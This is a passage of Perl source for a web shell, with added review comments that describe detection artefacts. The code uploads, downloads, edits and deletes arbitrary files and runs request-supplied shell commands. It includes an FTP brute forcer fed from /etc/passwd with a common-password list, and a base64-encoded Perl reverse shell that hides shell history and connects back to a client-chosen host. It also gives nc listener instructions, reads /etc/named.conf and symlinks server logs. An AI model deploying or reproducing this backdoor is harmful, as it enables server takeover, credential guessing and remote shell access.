#    $CurrentDir (request-controlled) joined with the basename of the client
#    supplied name, and the content is the raw upload body. New files created
#    by the web-server user in unexpected directories are the thing to
#    monitor for.
#  - Basename extraction `m!([^/^\\]*)$!` keeps everything after the last
#    "/", "^" or "\" (the "^" inside the class is literal).
#  - The `-e` test and the open() are separate steps, and close() is not
#    checked, so a short write (e.g. disk full) is still reported as
#    "Transfered N Bytes".
#  - Returns the result HTML (including the command form); it does not print.
#------------------------------------------------------------------------------
sub UploadFile
{
    # if no file is specified, print the upload form again
    if($TransferFile eq "")
    {
        return &PrintFileUploadForm;
 
    }
    my $result="";
    # start the uploading process
    $result .= "Uploading $TransferFile to $CurrentDir...<br>";
 
    # get the fullly qualified pathname of the file to be created
    chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
    $TransferFile =~ m!([^/^\\]*)$!;
    $TargetName .= $PathSep.$1;
 
    $TargetFileSize = length($in{'filedata'});
    # if the file exists and we are not supposed to overwrite it
    if(-e $TargetName && $Options ne "overwrite")
    {
        $result .= "Failed: Destination file already exists.<br>";
    }
    else # file is not present
    {
        # two-argument open with a literal ">" prefix: truncate/create for writing
        if(open(UPLOADFILE, ">$TargetName"))
        {
            binmode(UPLOADFILE) if $WinNT;
            print UPLOADFILE $in{'filedata'};
            close(UPLOADFILE);   # return value not checked
            $result .= "Transfered $TargetFileSize Bytes.<br>";
            $result .= "File Path: $TargetName<br>";
        }
        else
        {
            $result .= "Failed: $!<br>";
        }
    }
    $result .= &PrintCommandLineInputForm;
    return $result;
}
 
  790. #------------------------------------------------------------------------------
  791. # This function is called when the user wants to download a file. If the
  792. # filename is not specified, it displays a form allowing the user to specify a
  793. # file, otherwise it displays a message to the user and provides a link
  794. # through  which the file can be downloaded.
  795. #------------------------------------------------------------------------------
sub DownloadFile
{
    # Resolves the request parameter 'f' ($TransferFile) to a path and either
    # streams that file to the browser (option "go") or shows a link page.
    # Globals read: $TransferFile, $CurrentDir, $Options, $WinNT, $PathSep.
    # Globals written: $TargetFile.
    # if no file is specified, print the download form again
    if($TransferFile eq "")
    {
        &PrintPageHeader("f");
        return &PrintFileDownloadForm;
    }
   
    # get fully qualified path of the file to be downloaded
    # NOTE(review): bitwise & and | are used on the boolean match results
    # instead of && / ||. An absolute path is taken verbatim, so any readable
    # file on the host can be requested; a relative path is joined to the
    # request-supplied $CurrentDir.
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        return &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        return &PrintDownloadLinkPage($TargetFile);
    }
}
  825.  
  826.  
  827. #------------------------------------------------------------------------------
  828. # This function is called to execute commands. It displays the output of the
  829. # command and allows the user to enter another command. The change directory
  830. # command is handled differently. In this case, the new directory is stored in
  831. # an internal variable and is used each time a command has to be executed. The
  832. # output of the change directory command is not displayed to the users
  833. # therefore error messages cannot be displayed.
  834. #------------------------------------------------------------------------------
sub ExecuteCommand
{
    # Dispatches the request parameter 'c' ($RunCommand): "cd <dir>" is
    # resolved through the shell and stored in $CurrentDir, "edit <file>"
    # opens the save-file form, anything else is passed to RunCmd.
    # Returns an HTML fragment; every branch leaves an open <textarea> that
    # is closed at the end of the sub.
    # Globals read: $RunCommand, $CurrentDir, $CmdSep, $CmdPwd, $WinNT,
    # $cols, $rows. Globals written: $Command, $CurrentDir, $RunCommand.
    my $result="";
    if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
    {
        # we change the directory internally. The output of the
        # command is not displayed.
        # NOTE(review): the captured directory ($1) is interpolated unquoted
        # into a shell command line; $CurrentDir is replaced by whatever the
        # shell's pwd prints afterwards.
        $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
        chop($CurrentDir = `$Command`);
        $result .= &PrintCommandLineInputForm;

        $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
        # show a directory listing after changing into the new directory
        $RunCommand= $WinNT?"dir":"dir -lia";
        $result .= &RunCmd;
    }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
    {
        # SaveFileForm reads the file name from $RunCommand itself.
        $result .=  &SaveFileForm;
    }else
    {
        # Generic case: the command text is run as given by the request.
        $result .= &PrintCommandLineInputForm;
        $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
        $result .=&RunCmd;
    }
    $result .=  "</textarea>";
    return $result;
}
  862.  
  863. #------------------------------------------------------------------------
  864. # run command
  865. #------------------------------------------------------------------------
  866.  
sub RunCmd
{
    # Runs $RunCommand in $CurrentDir through the shell and returns its
    # output HTML-escaped line by line.
    # Globals read: $CurrentDir, $CmdSep, $RunCommand, $Redirector, $WinNT,
    # $CommandTimeoutDuration, $ShowDynamicOutput. Globals written: $Command,
    # $SIG{'ALRM'}, $| .
    my $result="";
    $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
    if(!$WinNT)
    {
        # Unix only: kill long-running commands via SIGALRM (see
        # $CommandTimeoutDuration and CommandTimeout).
        $SIG{'ALRM'} = \&CommandTimeout;
        alarm($CommandTimeoutDuration);
    }
    if($ShowDynamicOutput) # show output as it is generated
    {
        $|=1;
        # NOTE(review): two-argument pipe open; the trailing " |" makes open()
        # execute $Command via the shell with the web server's privileges.
        # The return value of open() is not checked.
        $Command .= " |";
        open(CommandOutput, $Command);
        while(<CommandOutput>)
        {
            # normalise line endings: strip "\n" / "\r\n", re-add "\n"
            $_ =~ s/(\n|\r\n)$//;
            $result .= &HtmlSpecialChars("$_\n");
        }
        $|=0;
    }
    else # show output after command completes
    {
        # Single-quoted: the literal text '$Command' is escaped here, nothing
        # is executed in this branch.
        $result .= &HtmlSpecialChars('$Command');
    }
    if(!$WinNT)
    {
        alarm(0);
    }
    return $result;
}
  898. #==============================================================================
  899. # Form Save File
  900. #==============================================================================
sub SaveFileForm
{
    # Builds the "edit file" form: shows the file's contents in a textarea
    # (via RunCmd with `type` or `less`) and a save button posting to a=save.
    # Expects $RunCommand to start with "edit " (the first 5 characters are
    # removed here).
    # Globals read: $RunCommand, $CurrentDir, $PathSep, $WinNT, $ServerName,
    # $ScriptLocation, $cols. Globals written: $save, $File, $rows, $msg,
    # $Prompt, $read, $RunCommand.
    my $result ="";
    substr($RunCommand,0,5)="";
    my $file=&trim($RunCommand);
    $save='<br><input name="a" type="submit" value="save" class="submit" >';
    # full path used only for the writability test below (untrimmed name)
    $File=$CurrentDir.$PathSep.$RunCommand;
    my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
    if(-w $File)
    {
        $rows="23"
    }else
    {
        # not writable: show a notice and a shorter textarea
        $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
        $rows="20"
    }
    $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
    # the file contents are produced by running a display command through RunCmd
    $read=($WinNT)?"type":"less";
    $RunCommand = "$read \"$RunCommand\"";
    $result .=  <<END;
    <form name="f" method="POST" action="$ScriptLocation">

    <input type="hidden" name="d" value="$CurrentDir">
    $Prompt
    <input type="text" size="40" name="c">
    <input name="s" class="submit" type="submit" value="Enter">
    <br>Command: <run> $RunCommand </run>
    <input type="hidden" name="file" value="$file" > $save <br> $msg
    <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
END
   
    $result .= &RunCmd;
    $result .=  "</textarea>";
    $result .=  "</form>";
    return $result;
}
  937. #==============================================================================
  938. # Save File
  939. #==============================================================================
# Writes $Data to $CurrentDir/$File. Returns 1 on success, 0 if open() fails.
# NOTE(review): the ($) prototype declares one argument but two are shifted;
# the caller invokes it as &SaveFile(...), which bypasses the prototype.
# Both the contents and the file name come from request fields (data, file);
# the name is joined to $CurrentDir with no normalisation.
sub SaveFile($)
{
    my $Data= shift ;
    my $File= shift;
    $File=$CurrentDir.$PathSep.$File;
    # two-argument open with the mode interpolated into the path
    if(open(FILE, ">$File"))
    {
        binmode FILE;
        print FILE $Data;
        close FILE;
        return 1;
    }else
    {
        return 0;
    }
}
  956. #------------------------------------------------------------------------------
  957. # Brute Forcer Form
  958. #------------------------------------------------------------------------------
  959. sub BruteForcerForm
  960. {
  961.     my $result="";
  962.     $result .= <<END;
  963.  
  964. <table>
  965.  
  966. <tr>
  967. <td colspan="2" align="center">
  968. ####################################<br>
  969. Simple FTP brute forcer<br>
  970. ####################################
  971. <form name="f" method="POST" action="$ScriptLocation">
  972.  
  973. <input type="hidden" name="a" value="bruteforcer"/>
  974. </td>
  975. </tr>
  976. <tr>
  977. <td>User:<br><textarea rows="18" cols="30" name="user">
  978. END
  979. chop($result .= `less /etc/passwd | cut -d: -f1`);
  980. $result .= <<'END';
  981. </textarea></td>
  982. <td>
  983.  
  984. Pass:<br>
  985. <textarea rows="18" cols="30" name="pass">123pass
  986. 123!@#
  987. 123admin
  988. 123abc
  989. 123456admin
  990. 1234554321
  991. 12344321
  992. pass123
  993. admin
  994. admincp
  995. administrator
  996. matkhau
  997. passadmin
  998. p@ssword
  999. p@ssw0rd
  1000. password
  1001. 123456
  1002. 1234567
  1003. 12345678
  1004. 123456789
  1005. 1234567890
  1006. 111111
  1007. 000000
  1008. 222222
  1009. 333333
  1010. 444444
  1011. 555555
  1012. 666666
  1013. 777777
  1014. 888888
  1015. 999999
  1016. 123123
  1017. 234234
  1018. 345345
  1019. 456456
  1020. 567567
  1021. 678678
  1022. 789789
  1023. 123321
  1024. 456654
  1025. 654321
  1026. 7654321
  1027. 87654321
  1028. 987654321
  1029. 0987654321
  1030. admin123
  1031. admin123456
  1032. abcdef
  1033. abcabc
  1034. !@#!@#
  1035. !@#$%^
  1036. !@#$%^&*(
  1037. !@#$$#@!
  1038. abc123
  1039. anhyeuem
  1040. iloveyou</textarea>
  1041. </td>
  1042. </tr>
  1043. <tr>
  1044. <td colspan="2" align="center">
  1045. Sleep:<select name="sleep">
  1046.  
  1047. <option>0</option>
  1048. <option>1</option>
  1049. <option>2</option>
  1050.  
  1051. <option>3</option>
  1052. </select>
  1053. <input type="submit" class="submit" value="Brute Forcer"/></td></tr>
  1054. </form>
  1055. </table>
  1056. END
  1057. return $result;
  1058. }
  1059. #------------------------------------------------------------------------------
  1060. # Brute Forcer
  1061. #------------------------------------------------------------------------------
  1062. sub BruteForcer
  1063. {
  1064.     my $result="";
  1065.     $Server=$ENV{'SERVER_ADDR'};
  1066.     if($in{'user'} eq "")
  1067.     {
  1068.         $result .= &BruteForcerForm;
  1069.     }else
  1070.     {
  1071.         use Net::FTP;
  1072.         @user= split(/\n/, $in{'user'});
  1073.         @pass= split(/\n/, $in{'pass'});
  1074.         chomp(@user);
  1075.         chomp(@pass);
  1076.         $result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
  1077.         foreach $username (@user)
  1078.         {
  1079.             if(!($username eq ""))
  1080.             {
  1081.                 foreach $password (@pass)
  1082.                 {
  1083.                     $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
  1084.                     if($ftp->login("$username","$password"))
  1085.                     {
  1086.                         $result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
  1087.                         $ftp->quit();
  1088.                         break;
  1089.                     }
  1090.                     if(!($in{'sleep'} eq "0"))
  1091.                     {
  1092.                         sleep(int($in{'sleep'}));
  1093.                     }
  1094.                     $ftp->quit();
  1095.                 }
  1096.             }
  1097.         }
  1098.         $result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
  1099.     }
  1100.     return $result;
  1101. }
  1102. #------------------------------------------------------------------------------
  1103. # Backconnect Form
  1104. #------------------------------------------------------------------------------
  1105. sub BackBindForm
  1106. {
  1107.     return <<END;
  1108.     <br><br>
  1109.  
  1110.     <table>
  1111.     <tr>
  1112.     <form name="f" method="POST" action="$ScriptLocation">
  1113.     <td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
  1114.     <td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
  1115.      Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
  1116.  
  1117.     <td><input name="s" class="submit" type="submit" name="submit" value="Connect"></td>
  1118.     </form>
  1119.     </tr>
  1120.     <tr>
  1121.     <td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
  1122.     <br>[+] Try check your Port with <a target="_blank" href="http://www.canyouseeme.org/">http://www.canyouseeme.org/</a>
  1123.     <br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
  1124.  
  1125.     </tr>
  1126.     </table>
  1127.  
  1128.     <br><br>
  1129.     <table>
  1130.     <tr>
  1131.     <form method="POST" action="$ScriptLocation">
  1132.     <td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
  1133.  
  1134.     <td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
  1135.  
  1136.      Password: <input type="text" size="15" name="bindpass" value="THIEUGIABUON"></td>
  1137.     <td><input name="s" class="submit" type="submit" name="submit" value="Bind"></td>
  1138.     </form>
  1139.     </tr>
  1140.     <tr>
  1141.     <td colspan=3><font color=#FFFFFF>[+] Chuc nang chua dc test!
  1142.     <br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
  1143.  
  1144.     </tr>
  1145.     </table><br>
  1146. END
  1147. }
  1148. #------------------------------------------------------------------------------
  1149. # Backconnect use perl
  1150. #------------------------------------------------------------------------------
  1151. sub BackBind
  1152. {
  1153.     use MIME::Base64;
  1154.     use Socket;
  1155.     $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7";
  1156.     $bindperl="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";
  1157.  
  1158.     $ClientAddr = $in{'clientaddr'};
  1159.     $ClientPort = int($in{'clientport'});
  1160.     if($ClientPort eq 0)
  1161.     {
  1162.         return &BackBindForm;
  1163.     }elsif(!$ClientAddr eq "")
  1164.     {
  1165.         $Data=decode_base64($backperl);
  1166.         if(-w "/tmp/")
  1167.         {
  1168.             $File="/tmp/backconnect.pl";   
  1169.         }else
  1170.         {
  1171.             $File=$CurrentDir.$PathSep."backconnect.pl";
  1172.         }
  1173.         open(FILE, ">$File");
  1174.         print FILE $Data;
  1175.         close FILE;
  1176.         system("perl backconnect.pl $ClientAddr $ClientPort");
  1177.         unlink($File);
  1178.         exit 0;
  1179.     }else
  1180.     {
  1181.         $Data=decode_base64($bindperl);
  1182.         if(-w "/tmp")
  1183.         {
  1184.             $File="/tmp/bindport.pl";  
  1185.         }else
  1186.         {
  1187.             $File=$CurrentDir.$PathSep."bindport.pl";
  1188.         }
  1189.         open(FILE, ">$File");
  1190.         print FILE $Data;
  1191.         close FILE;
  1192.         system("perl bindport.pl $ClientPort");
  1193.         unlink($File);
  1194.         exit 0;
  1195.     }
  1196. }
  1197. #------------------------------------------------------------------------------
#  File-system helpers used by the directory listing (remove, owner, perms, mtime, size)
  1199. #------------------------------------------------------------------------------
# Recursively deletes the directory $dir and everything under it.
# No return value; failures of unlink()/rmdir() are not reported.
# NOTE(review): uses the package-global bareword handle DIR and the global
# $file across recursive calls. -d follows symbolic links, so a symlink to a
# directory is descended into rather than unlinked.
sub RmDir($)
{
    my $dir = shift;
    if(opendir(DIR,$dir))
    {
        while($file = readdir(DIR))
        {
            if(($file ne ".") && ($file ne ".."))
            {
                $file= $dir.$PathSep.$file;
                if(-d $file)
                {
                    &RmDir($file);
                }
                else
                {
                    unlink($file);
                }
            }
        }
        closedir(DIR);
    }
    # rmdir failure is silently ignored (empty branch)
    if(!rmdir($dir))
    {
       
    }
}
# Returns "user/group" of $file on Unix (names resolved via getpwuid /
# getgrgid), or "???" on Windows or when the file does not exist.
# Globals written: $uid, $gid, $name, $group.
sub FileOwner($)
{
    my $file = shift;
    if(-e $file)
    {
        ($uid,$gid) = (stat($file))[4,5];
        if($WinNT)
        {
            return "???";
        }
        else
        {
            $name=getpwuid($uid);
            $group=getgrgid($gid);
            return $name."/".$group;
        }
    }
    return "???";
}
# Returns the parent of $CurrentDir as printed by the shell (cd "$CurrentDir";
# cd ..; pwd). The $path argument is overwritten and otherwise unused.
sub ParentFolder($)
{
    my $path = shift;
    my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
    chop($path = `$Comm`);
    return $path;
}
# Returns a permission string for $file: on Windows "r / w" style flags from
# the -r/-w tests, on Unix the four-digit octal mode (mode & 07777).
# Returns "0000" when the file does not exist.
# Globals written (Unix branch): $mode, $result.
sub FilePerms($)
{
    my $file = shift;
    my $ur = "-";
    my $uw = "-";
    if(-e $file)
    {
        if($WinNT)
        {
            if(-r $file){ $ur = "r"; }
            if(-w $file){ $uw = "w"; }
            return $ur . " / " . $uw;
        }else
        {
            $mode=(stat($file))[2];
            $result = sprintf("%04o", $mode & 07777);
            return $result;
        }
    }
    return "0000";
}
# Returns the mtime of $file formatted as "dd/m/yyyy HH:MM" in local time
# (@month maps the 0-based month index to its 1-based number), or "???" if
# the file does not exist.
# Globals written: $la, $d, $m, $y, $h, $i, @month, $lmtime.
sub FileLastModified($)
{
    my $file = shift;
    if(-e $file)
    {
        ($la) = (stat($file))[9];
        ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
        $y = $y + 1900;
        @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
        $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
        return $lmtime;
    }
    return "???";
}
# Returns the size in bytes of a plain file, or the string "0" for anything
# that is not a plain file (directories, missing paths).
sub FileSize($)
{
    my $file = shift;
    if(-f $file)
    {
        return -s $file;
    }
    return "0";

}
# Formats a byte count for display: up to and including 1024 -> "N B",
# up to and including 1 MiB -> "N.NN KB", otherwise "N.NN MB".
sub ParseFileSize($)
{
    my $size = shift;
    if($size <= 1024)
    {
        return $size. " B";
    }
    else
    {
        if($size <= 1024*1024)
        {
            $size = sprintf("%.02f",$size / 1024);
            return $size." KB";
        }
        else
        {
            $size = sprintf("%.2f",$size / 1024 / 1024);
            return $size." MB";
        }
    }
}
# Returns $string with leading and trailing whitespace removed.
sub trim($)
{
    my $string = shift;
    $string =~ s/^\s+//;
    $string =~ s/\s+$//;
    return $string;
}
# Doubles every backslash in $string (used when embedding paths in the
# JavaScript of the listing). Quotes are not escaped.
sub AddSlashes($)
{
    my $string = shift;
    $string=~ s/\\/\\\\/g;
    return $string;
}
  1332. sub ListDir
  1333. {
  1334.     my $path = $CurrentDir.$PathSep;
  1335.     $path=~ s/\\\\/\\/g;
  1336.     my $result = "<form name='f' action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
  1337.     if(-d $path)
  1338.     {
  1339.         my @fname = ();
  1340.         my @dname = ();
  1341.         if(opendir(DIR,$path))
  1342.         {
  1343.             while($file = readdir(DIR))
  1344.             {
  1345.                 $f=$path.$file;
  1346.                 if(-d $f)
  1347.                 {
  1348.                     push(@dname,$file);
  1349.                 }
  1350.                 else
  1351.                 {
  1352.                     push(@fname,$file);
  1353.                 }
  1354.             }
  1355.             closedir(DIR);
  1356.         }
  1357.         @fname = sort { lc($a) cmp lc($b) } @fname;
  1358.         @dname = sort { lc($a) cmp lc($b) } @dname;
  1359.         $result .= "<div><table width='90%' class='listdir'>
  1360.  
  1361.         <tr style='background-color: #3e3e3e'><th>File Name</th>
  1362.         <th style='width:100px;'>File Size</th>
  1363.         <th style='width:150px;'>Owner</th>
  1364.         <th style='width:100px;'>Permission</th>
  1365.         <th style='width:150px;'>Last Modified</th>
  1366.         <th style='width:260px;'>Action</th></tr>";
  1367.         my $style="line";
  1368.         my $i=0;
  1369.         foreach my $d (@dname)
  1370.         {
  1371.             $style= ($style eq "line") ? "notline": "line";
  1372.             $d = &trim($d);
  1373.             $dirname=$d;
  1374.             if($d eq "..")
  1375.             {
  1376.                 $d = &ParentFolder($path);
  1377.             }
  1378.             elsif($d eq ".")
  1379.             {
  1380.                 $d = $path;
  1381.             }
  1382.             else
  1383.             {
  1384.                 $d = $path.$d;
  1385.             }
  1386.             $result .= "<tr class='$style'>
  1387.  
  1388.             <td id='File_$i' style='font: 11pt Verdana; font-weight: bold;'><a  href='?a=gui&d=".$d."'>[ ".$dirname." ]</a></td>";
  1389.             $result .= "<td>DIR</td>";
  1390.             $result .= "<td style='text-align:center;'>".&FileOwner($d)."</td>";
  1391.             $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
  1392.             $result .= "<td style='text-align:center;'>".&FileLastModified($d)."</td>";
  1393.             $result .= "<td style='text-align:center;'><a href='javascript:return false;' onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."')\">Rename</a>  | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=$path&remove=$dirname'>Remove</a></td>";
  1394.             $result .= "</tr>";
  1395.             $i++;
  1396.         }
  1397.         foreach my $f (@fname)
  1398.         {
  1399.             $style= ($style eq "line") ? "notline": "line";
  1400.             $file=$f;
  1401.             $f = $path.$f;
  1402.             $view = "?dir=".$path."&view=".$f;
  1403.             $result .= "<tr class='$style'><td id='File_$i' style='font: 11pt Verdana;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>".$file."</a></td>";
  1404.             $result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
  1405.             $result .= "<td style='text-align:center;'>".&FileOwner($f)."</td>";
  1406.             $result .= "<td id='FilePerms_$i' style='text-align:center;' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
  1407.             $result .= "<td style='text-align:center;'>".&FileLastModified($f)."</td>";
  1408.             $result .= "<td style='text-align:center;'><a href='?a=command&d=".$path."&c=edit%20".$file."'>Edit</a> | <a href='javascript:return false;' onclick=\"rename_form($i,'$file','f')\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=$path&remove=$file'>Remove</a></td>";
  1409.             $result .= "</tr>";
  1410.             $i++;
  1411.         }
  1412.         $result .= "</table></div>";
  1413.     }
  1414.     return $result;
  1415. }
  1416. #------------------------------------------------------------------------------
  1417. # Try to View List User
  1418. #------------------------------------------------------------------------------
sub ViewDomainUser
{
    # Reads /etc/named.conf, extracts every `zone "..."` line and shows it
    # next to the owner of the matching file under /etc/valiases/.
    # Returns an HTML table, or an error paragraph when the file cannot be
    # opened.
    # NOTE(review): reads of /etc/named.conf and stat() calls on
    # /etc/valiases/* by the web server process are the observable artefacts.
    # Globals written: $err, $filename, $owner.
    open (domains, '/etc/named.conf') or $err=1;
    my @cnzs = <domains>;
    # 'd0mains' (digit zero) is a different bareword handle from 'domains'
    close d0mains;
    my $style="line";
    my $result="<h5><font style='font: 15pt Verdana;color: #ff9900;'>Hoang Sa - Truong Sa</font></h5>";
    if ($err)
    {
        $result .=  ('<p>C0uldn\'t Bypass it , Sorry</p>');
        return $result;
    }else
    {
        $result .= '<table><tr><th>Domains</th> <th>User</th></tr>';
    }
    foreach my $one (@cnzs)
    {
        if($one =~ m/.*?zone "(.*?)" {/)
        {  
            $style= ($style eq "line") ? "notline": "line";
            # path built from the matched line itself, not the capture
            $filename= "/etc/valiases/".$one;
            $owner = getpwuid((stat($filename))[4]);
            # single-quoted: "$style" is emitted literally into the HTML
            $result .= '<tr class="$style" width=50%><td>'.$one.' </td><td> '.$owner.'</td></tr>';
        }
    }
    $result .= '</table>';
    return $result;
}
  1447. #------------------------------------------------------------------------------
  1448. # View Log
  1449. #------------------------------------------------------------------------------
sub ViewLog
{
    # Lists a few well-known Apache log paths with a form that runs
    # `less <path>` through the command action. Unix only.
    # NOTE(review): for a log that is not writable it shells out to
    # `ln -s <log> error_log_<i>` in the process's working directory, so
    # symlinks named error_log_0, error_log_1, ... next to the script are an
    # artefact of this function.
    if($WinNT)
    {
        return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
    }
    my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
    my @pathlog=(
                '/usr/local/apache/logs/error_log',
                '/var/log/httpd/error_log',
                '/usr/local/apache/logs/access_log'
                );
    my $i=0;
    my $perms;
    my $sl;
    foreach my $log (@pathlog)
    {
        if(-w $log)
        {
            $perms="OK";
        }else
        {
            # command output goes to $sl; the tests below read the global $ls,
            # which this sub never assigns
            chop($sl = `ln -s $log error_log_$i`);
            if(&trim($ls) eq "")
            {
                if(-r $ls)
                {
                    $perms="OK";
                    $log="error_log_".$i;
                }
            }else
            {
                $perms="<font style='color: red;'>Cancel<font>";
            }
        }
        $result .=<<END;
        <tr>

            <form action="" method="post">
            <td><input type="text" onkeyup="document.getElementById('log_$i').value='less ' + this.value;" value="$log" size='50'/></td>
            <td><input class="submit" type="submit" value="Try" /></td>
            <input type="hidden" id="log_$i" name="c" value="less $log"/>
            <input type="hidden" name="a" value="command" />
            <input type="hidden" name="d" value="$CurrentDir" />
            </form>
            <td>$perms</td>

        </tr>
END
        $i++;
    }
    $result .="</table>";
    return $result;
}
  1504. #------------------------------------------------------------------------------
  1505. # Main Program - Execution Starts Here
  1506. #------------------------------------------------------------------------------
&ReadParse;
&GetCookies;

# Request parameters (short names): p=password, c=command, f=file, o=option,
# a=action, d=directory. All are read into package globals.
$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};
$Action = $in{'a'};

$Action = "command" if($Action eq ""); # no action specified, use default

# get the directory in which the commands will be executed
$CurrentDir = &trim($in{'d'});
# default: show a directory listing when no command was given
$RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");

# NOTE(review): the only authentication is a cookie named SAVEDPWD whose
# value must equal the plaintext $Password; that cookie value is the
# detectable credential in web server logs / traffic captures.
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;

if($Action eq "login" || !$LoggedIn)        # user needs/has to login
{
    &PerformLogin;
}elsif($Action eq "gui") # GUI directory
{
    # File-manager view; chmod / rename / remove are applied before listing.
    &PrintPageHeader;
    if(!$WinNT)
    {
        # 'chmod' is cast to int; the target path is shelled out in quotes.
        $chmod=int($in{'chmod'});
        if(!($chmod eq 0))
        {
            $chmod=int($in{'chmod'});
            $file=$CurrentDir.$PathSep.$TransferFile;
            chop($result= `chmod $chmod "$file"`);
            if(&trim($result) eq "")
            {
                print "<run> Done! </run><br>";
            }else
            {
                print "<run> Sorry! You dont have permissions! </run><br>";
            }
        }
    }
    # `!$rename eq ""` parses as `(!$rename) eq ""`: true when 'rename' is
    # non-empty. Both names are used as given (relative to the process's
    # working directory, not joined to $CurrentDir).
    $rename=$in{'rename'};
    if(!$rename eq "")
    {
        if(rename($TransferFile,$rename))
        {
            print "<run> Done! </run><br>";
        }else
        {
            print "<run> Sorry! You dont have permissions! </run><br>";
        }
    }
    # 'remove' is joined to $CurrentDir; directories are deleted recursively
    # (RmDir reports nothing), plain files via unlink.
    $remove=$in{'remove'};
